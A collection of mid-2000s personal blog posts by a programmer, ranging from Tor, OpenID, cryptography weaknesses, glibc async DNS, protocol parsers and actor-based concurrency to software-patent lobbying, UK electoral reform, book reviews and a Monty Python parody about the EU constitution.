    Many people feel uncomfortable that hotels should profit from a disaster in some sense of solidarity with the victims. Solidarity is fine, but I don't think that means that everyone must have a bad day because some people did. Anyway, getting back to the point.

    When the demand for something rockets (as it did for hotel rooms in London on Thursday) hotels could keep their prices the same. In that case there will be a shortage of rooms because rooms will be allocated nearly on a first come, first served basis. Some people might be able to walk home but will decide not to bother because a hotel room isn't all that expensive. Other's, who cannot get home, can't get a room because they have all gone. I don't think anyone would imagine that that's a good scheme.

    So when hotel prices go up some people will decide that they value their money more than the comfort of not having to walk home. Those left in the hotel will be those who value the hotel room more. In a world of perfect information there would be no shortage of hotel rooms because the price would rise such that demand was suppressed to the level where it could be met exactly.

    And yes, that means that wealthy people might be able to get hotel rooms where less wealthy people might not. That's the reality of wealth and I would hope that most people know enough history to know that the alternative is much worse.

    I took the time today to ...

    I took the time today to phone (some of) my MEPs about the software patent vote tomorrow. I picked the names somewhat at random so long as they were representatives for an area I live in. Remember that the outcome we want is a vote for the Buzek-Rocard-Duff amendments.

    • Caroline Lucas: Voting for, goes for all Greens. Glad I voted Green for the EU
    • Richard Ashworth: Didn't know how he was going to vote
    • Gerard Batten: No answer
    • Chris Beazley: Answering machine (left message)
    • Andrew Duff: As I dialed I suddenly remembered what the amendments were called and suspected that this was probably a good guy. He was.
    • Fiona Hall: Answering machine (left message)
    • Sarah Ludford: Didn't know. Will email me.

    Overall, not a stunning outcome.

    If you want to call some MEPs today (and please do) you can find phone numbers and names here. Remember that the international escape code is 00 (so replace + in phone numbers with that) and you don't dial the zero in brackets (if any).

    When I phoned I basically said this, and it seemed to work ok:

    Good afternoon. Is that the office of FULLNAME? I'm just phoning to register my hope that TITLE SURNAME will be voting for the amendments in the software patents vote tomorrow.

    ... and go with the flow from there. I found that the Brussels office is more often manned, but I think the actual people are at Strasbourg.

    (background information on this issue.)

    Was a little surprised to...

    Was a little surprised to see this in the Independent today (note the author). I suppose I shouldn't be since he talks so much anyway.

    Letter from RMS

    Decoupling authentication and IP addresses

    No one uses IP addresses for authentication these days, right? All that went out with rhosts one would hope. Sadly it's not true and when you have an anonymising onion network you really start to understand how important IP authentication still is.

    Many sites ban all Tor nodes from posting. Many IRC networks (even the `clueful' ones like freenode) ban Tor as well. This is usually caused by abuse from trolls using Tor, of course. But the only course of action that these networks have is to ban by IP address.

    So, more precisely, IP addresses aren't a source of authentication as much as they are a finite resource which can be used to hit people with. Like loosing a deposit, loosing an IP address is a punishment to deter people from abuse since IP addresses are considered finite.

    Now that's a pretty bad approximation and leads to people getting banned for no good reason because someone else was a troll from the same IP address. It really starts to go wrong in the face of large proxies (like AOLs), dynamic IP ranges and, of course, Tor.

    OpenID is the most exciting movement in this area that I've seen for a long time. (it's a protocol which could never be written by a standards body because it's designed to work given the realities of the Internet, not despite them. For an example of the latter see IPv6).

    OpenID basically lets you nominate a server as your `identity' and prove to a 3rd party that you control it. That doesn't solve anything right away because I can produce identities at will. What we need is an alternative limited resource which we can hit people with.

    Hashcash uses CPU time which is a little problematic because the speed difference between someone on a dual-core, 64-bit Athlon and a mobile phone is pretty big. Mojonation used disk space - which is problematic because it's difficult to make that work in this context.

    I'm suggesting that we use human time as measured by CAPTCHAs. Although the state of the art in breaking CAPTCHAs is getting pretty good, the best CAPTCHAs are still good enough. You can easily imagine a page which would take half an hour to complete and would sign an identity when done. That half an hour of time is the limited resource that you can loose.

    Of course, you can hire out a sweatshop in China to solve these things, or make a distributed network of people paid in free porn but the threat model here is the Slashdot troll. And how well would your IP address blocking scheme work against the same attack?

    What's the transition path? (If an idea doesn't have a transition plan that's probably because the transition will never happen; again, see IPv6.) Websites can start using this right away in the whole `single sign on' way that OpenID is designed to allow. Other services are more of a plain because specific client and server libraries need to be written along with an ssh-agent like daemon. So let's leave IRC alone for a while and see if we can get sites like Wikipedia to allow it.

    (Actually, in the case of Wikipedia I'm not too hopeful. I've had a patch to improve their IP blocking pending for weeks now with no movement what so ever.)

    MGM vs. Grokster

    (you should, of course, read read the judgement before reading any comments on it.)

    The important paragraph in this result is:

    One who distributes a device with the object of promoting its use to infringe copyright, as shown by clear expression or other affirmative steps taken to foster infringement, going beyond mere distribution with knowledge of third-party action, is liable for the resulting acts of infringement by third parties using the device, regardless of the device's lawful uses.

    This is pretty vague, legal wise. Consider the design of Freenet. Node operators were unable to see what data was stored on their node. It could have been fragments of any file and we considered that a defence against "questionable content" (e.g pro-democracy docs in China). Now, imagine that Freenet ever worked well enough to allow for large scale file sharing. Does that aspect of the design open us up to an MGM lawsuit? It's an `affirmative step' taken to make the network difficult to police. Therefore the argument comes down to `we weren't thinking of file sharing when we designed it - honest!'. It seems pretty impossible to believe that technically competent people wouldn't consider that any communication system could be used for file sharing.

    This ruling requires a lot of clarification before there can be any kind of checklist of what is illegal. In the mean time you have to consider if you want to develop any kind of network because you might get sued for it. That's exactly the permission world that MGM et al want. Change is a bitch for those who profit by the status quo.

    We apologise for this short interruption of service...

    Firstly, sorry to anyone who emailed me in the last three days and I didn't get back to them. My (somewhat crappy) host had a server failure and I didn't notice. The backlog of email is getting through now.

    Secondly, I'm on an RSI avoidance typing break for a while. Nothing serious, just a definite hint from my body that I need to stop hacking for a bit. I intend to do something about it when I get home (probably involving a Kinesis keyboard and trackball) but until then I'm taking a break and crewing (single-handedly it turns out) a play in Bethnal Green.

    Current hacking plans involve adding OAEP and DH support to nettle and then finishing pyThistle (a Python crypto library built on nettle). pyThistle then replaces libgcrypt (see rant below) in my Python Tor node. Hopefully, when the Tor node works it can be a platform for testing new ideas in Tor.

    Also, my Google searchkeys script might be used in a forthcoming book by Mark Pilgrim (of Dive Into x fame). That is assuming that I ever manage to remember to fax the permission form off.

    That's it. All done.

    Finished at Imperial. If you really want you can read my final project report. There's nothing new in there for IV readers.

    Well done BBC...And we've...

    Well done BBC...

    And we've just had another huge roll of thunder.

    At least no one is panicing

    We're at a strange point in cryptography at the moment. Two of our foundations are mortally wounded and no one seems to have a good answer to either of them. Our unfortunate foundations are SHA1 and AES.

    Lots of people have debated about how important the break of SHA1 (and MD5 et al) really is. These two postscript documents with the same hash are the latest round from the “it's important!” crowd. The defense is pointing out that the postscript files are actually programs which introspect themselves and you can never trust such a document etc.

    But the point is that you now have to sit down and consider if the way that you're using SHA1 is weak. That's morally wounded. A good hash function shouldn't need thought to use.

    Next up, AES. The blow was delivered by DJB in this paper. I've not seen many people talking about it, but it seems to me that you now have to sit down and consider how you're using AES and how much timing information you're leaking each time you use it. That's also mortally wounded.

    So, where do we go from here? (And, if you can hear the tune as you read those words you're a wise man )

    Why one should never use libgcrypt

    I've been using libgcrypt in a Tor related project and I must say that it's terrible:

    • The public key interface is so terribly abstract they've implemented S-expressions (in C) via which you pass all the data. It's only two algorithms! The abstraction layer is several times thicker than the actual useful code!
    • (yes, they do have an alternative interface to the public key code but it's little better and restricted. I'm now using the MPI code directly and implementing RSA myself. The MPI code, at least, works.)
    • None of the hashes can be used progressively. Once you call read() you can't update them any more.
    • Counter mode is a joke. I spent about three hours tracking down a bug only to find that their idea of counter mode was completely wrong. I've sent a patch, but no reply yet.

    Mr. Blair: 'Ello, I ...

    Mr. Blair: 'Ello, I wish to register a complaint.

    (The owner does not respond.)

    Mr. Blair: 'Ello, Miss?

    Owner: What do you mean "miss"?

    Mr. Blair: I'm sorry, I have a cold. I wish to make a complaint!

    Owner: We're closin' for lunch.

    Mr. Blair: Never mind that, my lad. I wish to complain about this constitution what I purchased not half an hour ago from this very boutique.

    Owner: Oh yes, the, uh, the EU Constitution...What's,uh...What's wrong with it?

    Mr. Blair: I'll tell you what's wrong with it, my lad. 'E's dead, that's what's wrong with it!

    Owner: No, no, 'e's uh,...it's paused.

    Mr. Blair: Look, matey, I know a dead constitution when I see one, and I'm looking at one right now.

    Owner: No no it's not dead, it's, it's paused'! Remarkable constitution, the EU constitution, idn'it, ay? Beautiful language!

    Mr. Blair: The language don't enter into it. It's stone dead.

    Owner: Nononono, no, no! 'E's paused!

    Mr. Blair: All right then, if he's paused', I'll start it up!. 'Ello, Mister Constitution! I've got a lovely fresh new member for you if you show...

    (owner hits the cage)

    Owner: There, it passed!

    Mr. Blair: No, it didn't, that was you fixing the vote!

    Owner: I never!!

    Mr. Blair: Yes, you did!

    Owner: I never, never did anything...

    Mr. Blair: (yelling) 'ELLO POLLY!!!!! Testing! Testing! Testing! Testing! This is your nine o'clock alarm call!

    (Takes constitution and thumps it on the counter. Withdrawls plans for a UK referendum)

    Mr. Blair: Now that's what I call a dead constitution.

    Owner: No, no.....No, it's stalled!

    Mr. Blair: STALLED?!?

    Owner: Yeah! You stalled it, just as it was gettin' going! EU Constitutions stall easily, major.

    Mr. Blair: Um...now look...now look, mate, I've definitely 'ad enough of this. That constitution is definitely deceased, and when I supported it not 'alf an hour ago, you assured me that its total lack of movement was due to voter apathy

    Owner: Well, it's...it's, ah...probably a protest vote against unpopular governments

    Mr. Blair: PROTEST' against unpopular GOVERNMENTS?!?!?!? What kind of talk is that?, look, why did it fall flat on its back the moment it got put to the vote?

    Owner: The EU Constitutions prefers keepin' on it's back! Remarkable constitution, id'nit, squire? Lovely language!

    Mr. Blair: Look, I took the liberty of examining that constitution when I got it home, and I discovered the only reason that it even been proposed in the first place was that NO ONE had ever managed to read it all.

    (pause)

    Owner: Well, o'course no one's read it! If people read it they would be marching down the streets DEMANDING its introduction

    Mr. Blair: "DEMANDING"?!? Mate, this constitution wouldn't be introduced if you put four million volts through it! 'E's bleedin' demised!

    Owner: No no! 'E's stalled!

    Mr. Blair: 'E's not stalled! 'E's passed on! This constitution is no more! It has ceased to be! 'E's expired and gone to meet its maker! 'E's a stiff! Bereft of life, 'e rests in peace! If you hadn't started on about the rebate 'e'd be pushing up the daisies! Its metabolic processes are now 'istory! 'E's off the twig! 'E's kicked the bucket, 'e's shuffled off 'is mortal coil, run down the curtain and joined the bleedin' choir invisibile!! THIS IS AN EX-CONSTITUTION!!

    Owner: What about that rebate then?

    Mr Blair: fuck off.

    New page - ICSM Choir at ...

    New page - ICSM Choir at St Paul's Church recorded by YT.

    Live 8

    You can now txt C to the Live 8 number (84599) to enter into the draw. Let's say, for example, that 10 million people enter. There are 72,500 winners (each winner gets a pair of tickets, but I'll not count the lucky tag-alongs as winners for now). So there's a 72500/10000000 = 1/133 chance of winning a ticket. Since each entry in the draw costs £1.50-£1.60 the effective price of a ticket-pair is £199-£213. That's one hell of an expensive ticket!

    New page up about using T...

    New page up about using Tor with Firefox 1.1

    Asynchronous DNS lookups with glibc

    This is very poorly documented, but glibc can do DNS lookups asynchronously. You can get the original design document here, but it's a bit verbose.

    Firstly, this is glibc specific and you need to link against libanl. The headers you'll need are netdb.h and signal.h

    The core function is getaddrinfo_a which takes four arguments:

    int getaddrinfo_a(int mode, struct gaicb *list[], int ent, struct sigevent *);

    The mode is either GAI_NOWAIT or GAI_WAIT. Since you're trying to do asynchronous lookups you'll want GAI_NOWAIT. A gaicb looks like:

    struct gaicb {
    	const char *ar_name;
    	const char *ar_service;
    	const struct addrinfo *ar_request;
    	struct addrinfo *ar_result;
    };

    You should see the manpage for getaddrinfo for details of those fields. In short, set ar_name to the hostname, ar_service, ar_request and ar_result to NULL.

    So, getaddrinfo_a takes a pointer to a list of those structures and ent is the number of entries in that list. The final argument tells glibc how you want to be informed about the result. A sigevent structure looks like:

    strict sigevent {
    	sigval_t sigev_value;
    	int sigev_signo;
    	int sigev_notify;
    	void (*sigev_notify_function) (sigval_t);
    	pthread_addr_t *sigev_notify_attributes;
    };

    So you can either ignore the notification (set sigev_notify to SIGEV_NONE), get a signal (set sigev_notify to SIGEV_SIGNAL) or request a callback in a new thread (set SIGEV_THREAD).

    Hopefully the rest of the values are fairly obvious in light of that. If you want the sigev_value to be passed to a signal handler you'll need to register the handler with the SA_SIGINFO flag to sigaction. Also remember that the realtime signals (SIGRTMIN+0 to SIGRTMIN+31) are free for user-defined uses.

    When you get notified (or, indeed, at any time) you can call int gai_error(struct gaicb *) which will return 0 if the request is ready. A return value other than EAI_INPROGRESS is an error code which you can find as EAI_* in netdb.h. Once you know that a request has completed you can get the result from the ar_result member. And you will remember to call freeaddrinfo won't you?

    First release of new proj...

    First release of new project: pyGnuTLS

    Hmm, I wonder if it's getting too complex...

    Apparently I'm all wet!

    Jeff Darcy replies to my last post:

    What Adam seems to be considering is only a pure party-list system, in which there is no geographic representation at all, but thats not the only kind. In fact, under either an Additional Member System or Mixed Member System (from the copy of the Voting Systems FAQ that I've been hosting for two years), the exact balance between geographically-elected and “at” large candidates can be set anywhere from one extreme to the other just by adjusting the number of representatives selected each way. If the "my local representative works for me" dynamic is weaker under such a system, its by design.

    When people shout “proportional representation”, that's what they mean around here. I didn't mean to suggest that other systems with proportional elements don't exist, but even in those systems my concerns still stand (to a greater or lesser extent, depending on the degree of proportionality).

    Proportional representation is not a way to select MPs, it's a way to select parties. In a proportional vote you really might as well give the parties block votes and save the effort. Debates may be held, but a party has made its mind up by the time the bill reaches the house. (The quality of Commons debates is usually pretty bad as well.)

    That brings me to a more general kind of question about arguments like Adams. Why is geographic representation considered so important anyway?

    Geographic selection is much less useful and less needed now than ever before. But it still gets us a specific representative for each person in the country. (As you can guess, I quite like that.) I think there should be more feedback for a legislature than a single vote once every five years. I just don't see that a letter to "party headquarters" is the same. (Maybe I'm fooling myself in thinking that writing to an MP makes any more difference at the moment.)

    So maybe we would be better off without a geographical basis. Let people vote for a single party and give that party voting power equal to number of votes/total number of voters. The party can then use their fraction to vote in a representative manner (possibly with internal voting procedures). We could all vote for the "Freedom loving geek party" and be happily represented.

    (In fact, if a party were allowed to split their fraction into "yes" and "no" parts we could vote for a direct democracy party which would let its members vote on each and every decision and split the party vote accordingly. Direct democracy worries me because a great many of my fellow countrymen are really stupid. Several years ago I'm sure that a popular vote would have introduced the death penality for pediatricians, such was the public concern about pedophiles.)

    This also leaves open the question of how the executive is selected. At the moment it's the leader of the biggest party (well, actually, it's up to the Queen, but she's pretty predictable). With a proportional system may well need to directly elect the executive too. Condorcet anyone?

    But I'm unsure about proscribing such a change because there are likely to be lots of emergent effects. Thus my support for a fairly modest change (to approval voting) at first.

    Male Brains

    A little while back the president of Harvard upset a lot of people by suggesting that men and women aren't identical. Steven Pinker and Elizabeth Spelke recently had a fantastic debate on this subject (though they are careful to call it a conversation for some reason). You should absolutely take the time to watch it.

    As you can probably guess I started watching it with the opinion that there are important differences between males and females which go some way to explaining the ratio in top-tier academic positions. After watching it I still have that view, but I enjoyed Spelke's presentation as a mental exercise in picking apart arguments if nothing else.

    I think that discrimination is stupid and wrong and I certainly don't support “affirmative action”. Discrimination is still wrong even when someone says “It's fine in this case because it's discriminating in favor of what I want”. It's amazing how quickly some groups turn about when the discrimination is in their favor.

    Electoral Reform

    Once again, many people are looking at the numbers of MPs vs. the percentage of votes cast and noting the sad difference that first-past-the-post brings. Proportional representation and STV are being shouted again.

    Firstly, STV sucks[1][2]. It should never be used for anything.

    Secondly, proportional representation means that no one is responsible for you. At the moment, you can type your postcode into TheyWorkForYou and find out your your MP is. Your very own MP and there's no discussion about who is responsible for listening to your concerns.

    Party lists mean that many people are responsible for you, and that means that no one is. And they have to vote with the government because their job depends on it. MPs in this situation become so useless they could just as well give the parties a block vote and be done with it.

    And, of course, there are lots of parties and lots of backroom dealings to form coalitions. Ick.

    As a first step I think we should switch to constituency based approval voting to eliminate tactical voting and redistrict to make things a little more fair. It's a good first step and we can reassess things after a couple of elections under that system.

    (Lack of posting due to e...

    (Lack of posting due to exams - which still aren't over)

    Yep, I've voted. Actually I did it sometime ago since it was a postal vote. Not because I'm lazy, but because I live on the other side of the country. I actually quite like going to the polls and wouldn't postal vote given the chance.

    Truly, this time, it was a question of the least bad option. There are no center-right options in this country. Because of that we'll wake up tomorrow with another Labour government, but with a reduced majority.

    The country feels like it's standing in line at the supermarket. The queue is dreadful but, looking to the left and right - none of the others look like they're moving any faster. So you just stay where you are because you really don't want to jump queues and find out that the original one was a better option.

    Never mind, because much more important to the future is the French vote on the EU Constitution later this month - and I don't even get to vote in that.

    Better typing through key maps

    Everything I program these days is either C++ or Python and I'm sure that if a keyboard was designed by Python programmers it wouldn't be Qwerty. "Dvorak" they shout and I know that it works for some - but not for me. It screws me up too much whenever I use another computer.

    However a few small tweaks have improved the comfort to Qwerty a lot for me. I have these mappings at Vim insert level (imap) so they only happen in one mode of one application, which works ok for me (though it is a pain when using the Python interactive console). They all consist of switching an unshifted keypress with a shifted one. (please note that I use a UK keyboard.)

    Python

    • '-' ↔ '_' — __init__, function_names, need I say more? Underscore is a much more useful character to have unshifted.
    • '9' ↔ '(' and '0' ↔ ')' — again, brackets are far more useful than the numbers, though I do type 0 far more often that I had realised.
    • ';' ↔ ':' — when is semi-colon ever used in Python?

    C/C++

    • The whole top row from '1' to '-' — '"', '&' and '*' esp useful to have to hand. Also shifting all the numbers doesn't mean that some digits are shifted and some aren't, as with my Python mappings.
    • '`' ↔ '->' — not a key mapping as such since the result is more than one character long - but very useful.

    For C++ I'm also looking at the '\'' and '#' keys and wondering if they could be put to better use.

    Parsers for network protocols

    (If you wish, you can see this post as being related to the previous two. This is all about automatically building state machines, which happens to be very useful in Actor systems. If you can make all your actors stack-free then you can save memory, schedule them across worker threads etc. But, it also stands alone.)

    Parser theory is well established. People usually reach for the parser generator when it comes to handling complex files. (Possibly not quite as often as they should if the state of some config parsers is anything to go by.) Parsers are understood and work.

    Why then does no one use them for parsing network protocols? It's not like network protocols are too simple. Take section nine of the IMAP RFC. That's complex. Why does anyone want to write a parser for that when the EBNF is provided?

    Did you know that the following is valid HTTP?:

    GET / HTTP/1.1
    Host:
      www.webserver.com

    If you read the HTTP RFC and the EBNF definitions of LWS etc you can check it. It's the sort of thing that hand built parsers often miss. It doesn't work with whatever webserver /. is using for one.

    These aren't simple protocols and, if you're coding in C/C++, chances are you'll screw it up in a buffer-overflowable or a seg-fault-killing-the-whole-process way. Parsers can do it better.

    So why don't people use generated parsers? Probably because they've been designed for parsing files and all the toolkits are built around that idea:

    • Common generated parsers don't allow partial results. They parse the whole thing and give you a big tree but you probably want information about what's happening as they happen.
    • Parsers often generate foul right-recursive parse trees.
    • Parsers often need a tokenising pre-processing step which doesn't work well for network protocols which have complex token rules and binary data mixed in with the text.
    • Parsers often need lots of rule mangling before the grammar works.

    Less importantly...

    • Parser generators aren't that simple. Even an SLR parser (a simple one) takes 800 lines of Python in my implementation.
    • They're slower. Probably not an issue with C code, but my pure Python parser does only 200 HTTP headers/second on a 450MHz PII.

    I've addressed the first four problems something I'm hacking up at the moment. Firstly, you can tell when any reduction happens as soon as you feed the data into the parser. So you could ask for the HTTP headers as they happen.

    To explain the second problem, consider SLR type rules:

    Token := TokenChar
    Token := TokenChar Token

    That parses one-or-more TokenChars into a single Token. But that leaves you with a parse tree like this for the input POST: ['P', ['O', ['S', ['T']]]]. The key to this are reduction functions which do something sensible with the parse tree as they're being generated. The above would be:

    Token = OneOrMore(TokenChar, string_)

    Where string_ is a special marker which says "It's a string, so give me something sensible in the parse tree" If nothing does what you need, you can define your own:

    Token = OneOrMore(TokenChar)
    def Token_reduce(values):
    	return ''.join(values)

    (and that does exactly the same thing.) Also, special forms like OneOrMore save you from thinking (too much) about how to write the grammar. OneOrMore is a simple case but something like Alternation(a, b) (a sequence of a, separated by b with optional bs at the beginning and end with reduction functions which give you a flat list of them) isn't.

    So that's the evangelising for now. People should use parser generators for network protocols because who the hell wants to write another damm HTTP parser by hand (which you'll probably screw up)?

    More tricks

    Parsing is good. But there are more state machines in network protocols than just parsing. Take SMTP:

    220 imperialviolet.org ESMTP
    MAIL FROM: foo@foo.com
    250 ok
    RCPT TO: bar@bar.net
    250 ok
    DATA
    354 go ahead
    Subject: testing
    
    Hello there!
    .
    250 ok 1114338782 qp 5232
    QUIT
    221 imperialviolet.org

    Here a valid conversation can't have a DATA after the RCPT TO if the RCPT TO failed. So you could have the parser working line-by-line and a higher level state machine tracking the valid commands at this point etc. (I would admit that a per-line generated parser for SMTP would be overkill.)

    So let us introduce two new terminals: T and ⊥ which are «command successful» and «command failed». We can inject these into the parser when we're finished processing a command and then define a conversation something like this:

    RCPTTO = RCPTTOCommand
    RCPTTO = RCPTTOCommand, ⊥ RCPTTO
    SMTPConversation := HELOCommand, T, MAILFROM, T, RCPTTO, T, DATA, T

    (That's not RFC at all, but humor me.) So a client can have as many failed RCPT TO commands as they like, but can't send a DATA command until one has completed. Thus, if the parser parsed it, it's a valid command and you don't need to keep track of the state yourself.

    On Intelligence

    Review: On Intelligence, by Jeff Hawkins

    I finished this book with a sense of dissatisfaction. The author makes some fairly grandiose claims about advancing the state of AI and normally that would be the sign of a moonbat. However, I was impressed with what little I saw of his talk at Google last year.

    Sadly this book is very dilute. There is some good stuff in there but I think that his co-author (almost certainly forced on him by the publisher) had been told to water it down for a more lay audience. About half the paragraphs in the book need removing.

    There's something worthwhile in there. What I take away from this book is a resuscitated hope that there is a general algorithm for the brain. So many AI papers have claimed that their algorithm was the magic fairy dust that myself, and others, had mostly given up on the whole venture - conceding that the brain was inelegant.

    But given the scant neurological evidence presented in the book what would have really sold me is a good computer implementation. He makes grand claims about the possibility of one without ever trying it out. There is something along those lines here, but nothing seems to be moving very fast.

    Maybe the ideas here will shape a future AI revolution, but the author isn't fanning the flames with this book.

    Directions in future languages - edge triggered IO

    This is a follow up to the actors model post, below. That was a fairly generic advocation and this is a specific demonstration of how to build a small part of such a system.

    In an actors model (in mine at least) actors only ever block on message receive. Blocking on I/O is not an option and so one uses all the usual techniques of setting O_NONBLOCK. One actor in the system is special, however, and blocks on an I/O multiplexing call (select, poll etc). This actor sends signals to other actors when interesting I/O is ready.

    So assume that the I/O actor is using select/poll to wait for events. Data arrives from the network, sending the descriptor high, and the poll call returns. The I/O actor fires a message off to the correct actor and carries on.

    However, the next poll call will return immediately because the other actor probably hasn't had a chance to perform a read and empty the kernel buffers yet. So the only option is to remove the descriptor from the set of `interesting' ones and force any actor which wants to do I/O to reenable it with a message as soon as they have finished reading.

    This is a mess as it involves lots of messages going back for forth. There is a better way.

    Recent multiplexing calls (epoll under Linux 2.6, kqueue under FreeBSD and realtime signals under Linux 2.4) have an edge triggered mode. In this mode the call only delivers events on a rising edge. So if a socket becomes readable it will tell you once. select and poll will tell you whenever the socket is readable.

    This is clearly ideal for an actors model. The I/O actor waits for edge notifications and sends messages. The descriptor doesn't need to be removed from the interesting set and another actor can read the data at its leasure.

    In the case of flow control even the descriptor need not be removed. An actor can just ignore the edge message if it doesn't currently want more data. In the future it can read until EAGAIN and then start waiting for edge messages again.

    Thus my actors which talk to a socket end up looking like this:

    def run(self):
    	send-message-to-io-actor-registering-my-interest-in-a-certain-fd()
    
    	while True:
    		if interested-in-reading-data:
    			read-data-until-EAGAIN()
    
    		message = receive-message()
    		if message == edge-notification-message:
    			continue
    		...

    Directions in future languages - actor based concurrency

    What I'm looking for is a quote from Zooko about why any kind of preemptive or co-operative threading model is unsettling. I can't find one so I'm going to make it up:

    I don't like it because I can never be sure, from line to line, that the world hasn't just changed behind my back. -- not zooko

    Which is true; tragically so in preemptive systems and enough to keep you on your feet in syncthreaded (co-operative) ones. I've long said that it's far too easy to screwup preemptive multithreading with its locks, deadlocks, livelocks and super-intelligent-shade-of-the-colour-blue locks. Syncthreading quietens down things enough for me and yet lets you keep the same flow-of-control.

    (I like the flow-of-control. Fully asynchronous code with huge state-machines is a mess.)

    But I've just dumped syncthreading for an actors model in my current project - mostly for non-concurrency related reasons. (And certainly not because I have a compulsive disorder which causes me to dump and rewrite any code which is starting to work .)

    An actors model involves many threads co-operating via copy-everything message passing. It's an asynchronous pi-calculus if you like that sort of thing (which I don't). Copy-everything means no shared data and no locks. At all.

    The majority of threads are short classes (a couple of pages of Python) with a simple specification. They are nearly all small state-machines which return to the same point after each message. There's a single blocking function - recv which gets the next message.

    You break up threads in much the same way you break up functions. You get a feel for how much complexity should be contained in each one. The diagram on the right is taken from my project report at the moment - each block is an actor (and a single class) and they exchange messages with the other blocks that they're connected to. It may look a little complex, but that's smaller than the class inheritance diagrams in many systems.

    Any the reasons for choosing it over syncthreading are a little odd for a concurrency model: modularity and unit testing.

    I like unit tests. I don't think there's a whole lot of disagreement about their utility so I'm going to leave it at this: unit tests good.

    It's always good and easy to write unit tests for some things - data structures are prime choice. Lots of scope for silly errors and no side effects. You can write a good data-structure unit test and feel good about yourself.

    It's side effects which make unit tests difficult to write. If your code interacts with the outside world, bets are your unit tests are limited.

    And that's the wonderful thing about actors - almost nothing interacts with anything else directly. It's all via message passing and that's eminently controllable by unit tests. If you want to test your timeout logic in a unit test it's not a problem. Timeouts are just messages like anything else and you can sent them in any order you choose.

    Likewise I'm fairly sure that the code ends up being naturally more reusable. For all the same reasons; a lack of direct external dependencies.

    My design is mostly taken from Erlang. There are a lot of links in the C2 wiki page but there was a very good talk about Erlang at the LL2 conference and they recorded it. It's real-media but mplayer copes with it for me.

    Market Forces

    Market Forces is from the same author as Altered Carbon. I read the latter some time ago and, although I quite enjoyed it, I didn't feel that I'd actually gained anything by the end of it. I'm quite happy just reading for pleasure but, with every book there's a scale of effect, from the profound to these two. These are deeply unimportant books.

    Market Forces is billed as some great anti-globalisation work and is meant to be about large multi-nationals who take sides in wars for a piece of the post-war pie. Frankly, our governments do this already and so the idea isn't very shocking.

    But the focus is on the lead character, Chris Faulkner, who is a rising star in this corporate world. The book also tries to be a character development story, charting how power corrupts - or something. I didn't ever feel that I understood or empathised with this character. His fall from grace seemed more a series of random acts than a warning shot that we can all be driven to immoral acts in a corrupting environment.

    And much of the action involves legal kill-or-be-killed car battles. These companies compete for deals by having the best drivers in a ritual combat. Why? I assume there's an answer in the author's head, but he certainly didn't write it down for the rest of us.

    DVD: Battlestar Galactica

    Battlestar Galactica [introduction mini-series][series 1] - yes it was that film that they show on TV at Christmas with the robot dog and the baddies who look like tin cans with the front of the Knight Rider car glued on. Forget it. This isn't a remake, it's a thousand times better.

    Although has some of the same story elements as the original this show has great writers, great cast and looks beautiful. Watch it.

    In other news

    Welcome to Britain. As soon as it gets Royal Assent:

    • You can be arrested for any offense. Once arrested you have to give fingerprint and DNA samples which will be kept on record for ever.
    • You need written permission from the police commissioner (who answers to the Home Secretary) in order to protest within 1km of Parliament. That extends to cover Vauxhall Bridge, all of Waterloo, Trafalgar square and falls just shy of Hyde Park Corner.

    I suppose we should be thankful that the ID cards bill got dropped:

    "Labour's manifesto will confirm that the reintroduction of identity cards legislation will be an early priority after the election."

    Sony patent takes first step towards real-life Matrix. The described device seems very interesting and probably worthy of the patent ... if it worked. Quoting from that NS text:

    There were not any experiments done ... This particular patent was a prophetic invention. It was based on an inspiration that this may someday be the direction that technology will take us.

    And reminding ourselves about the requirements for a patent:

    An invention is the creation of a new technical concept and the physical means to implement or embody the idea. That physical means, prototype, or tangible form referred to as reduction to practice is what separates a discovery from an invention.

    So; yet another result of the super-secret US patent office source code: while 1: print 'granted'

    Fixing LCD subpixel hinting

    Subpixel hinting uses that fact that LCD displays have separate red-green-blue cells in order to triple the x resolution of the display resulting in nicer fonts etc.

    However, this assumes that the system knows the ordering of the cells in the LCD, and this differs from system to system. If, when you look at your fonts, you see a red and blue tinge at the edges of vertical strokes, your font render has guessed wrong.

    In that case, drop this little file into your homedir as ~/.fonts.conf, restart programs and everything will be fixed. You're welcome.

    <?xml version="1.0"?>
    <!DOCTYPE fontconfig SYSTEM "fonts.dtd">
    <fontconfig>
           <match target="font">
                   <edit name="rgba" mode="assign"><const>gbr</const></edit>
           </match>
    </fontconfig>

    Gmail: still counting

    Google doubles GMail storage to 2GB - wrong. Should read "Google increases GMail storage to 2050MB and still counting" .

    (Though looking at the page source suggests that it will stop at 2075MB)

    Why POSIX AIO has such a schizophrenic time

    The Linux AIO effort is doing pretty well. It now has kernel interfaces to handle the AIO calls and the performance is looking pretty good.

    Talking about AIO is often an odd experience because people don't realise that it does a completely different job to asynchronous network IO. There are two utterly separate problems that AIO can solve:

    • High performance IO: giving the kernel better information about future IO requests thus allowing it to order them for better throughput etc.
    • Issuing IO requests without blocking.

    Networking calls have always had a non-blocking option since Berkeley sockets. Filesystem IO has never had one for some reason. This leads to programs which either handle filesystem congestion very badly or by using IO worker threads to try and cope in an otherwise single-threaded program.

    For an example of the first, try having an NFS mounted home directory when the network fails. Everything drops into disk-wait because all the filesystem calls block for many minutes.

    Networking calls have always been non-blocking because everyone knows that network calls can take ages to complete. But with the relative speed of modern CPUs/Memory against disks (and certainly network based filesystems) we really need non-blocking file IO.

    Sadly the POSIX AIO API only deals with the first problem. open, getdents etc calls still block.

    So, kernel developers, quit tweaking little things. We want some real progress! Give us non-blocking file IO which works with epoll.

    Update: Something I didn't make clear. Non-blocking support is a stronger feature than high-performance support. If a kernel has non-blocking filesystem support it implies that it has high-performance support too.

    Future Battles

    I'm sure that everyone who uses Firefox (1.0.2, keeping up with the security releases, right?) has discovered AdBlock. A more useful plugin doesn't exist (well, maybe greasemonkey with some good scripts) but I think we can expect that AdBlock is going to work a whole lot worse quite soon.

    We've seen the efforts that some sites put into getting pop{up|under}s passed blockers. They don't seem to be doing too well from my point of view, but may be I just don't go to the right sites. None the less, they are fighting a loosing battle. Fundamentally the browser can stop Javascript on random sites from opening new windows - it's not rocket science.

    The battle AdBlock is fighting is the other way round. For the moment, many sites are neatly organised with all their adverts in a directory called /ads/, or from a host called advertising.com. This makes AdBlock work very well with simple patten matching. But I soon expect that we'll see sites where every image is a random filename.

    What do we do then? We could use greasemonkey scripts to rewrite the webpage as we like, right? We could remove the adverts and we can get rid of non-image adverts too (which AdBlock currently doesn't).

    That's going to work for a while; probably a long time after AdBlock stops working due to the amount of effort required to create each script. Someone only needs to create it once, but there are a lot of websites and people will have to download and install these things etc.

